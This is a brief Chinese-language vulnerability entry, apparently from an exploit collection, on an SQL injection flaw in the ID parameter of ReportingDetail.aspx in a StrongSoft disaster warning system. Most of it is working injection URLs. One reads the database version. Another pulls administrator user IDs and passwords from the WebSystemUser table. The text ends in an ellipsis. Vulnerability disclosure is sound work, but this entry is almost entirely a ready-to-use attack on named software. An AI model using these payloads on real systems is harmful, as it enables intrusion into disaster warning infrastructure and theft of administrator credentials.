StrongSoft灾害预警系统ReportingDetail.aspx ID参数SQL注入漏洞

注入链接：/Disaster/Reporting/ReportingDetail.aspx 注入参数：ID 【获取数据库版本】 /Disaster/Reporting/ReportingDetail.aspx?ID=1' AND 3=CHAR@@version -- 【管理员账号密码】 /Disaster/Reporting/ReportingDetail.aspx?ID=1' AND+2709=select+top+1+UserID%2b'---'%2bUserPwd+from+strongmain.dbo.WebSystemUser--...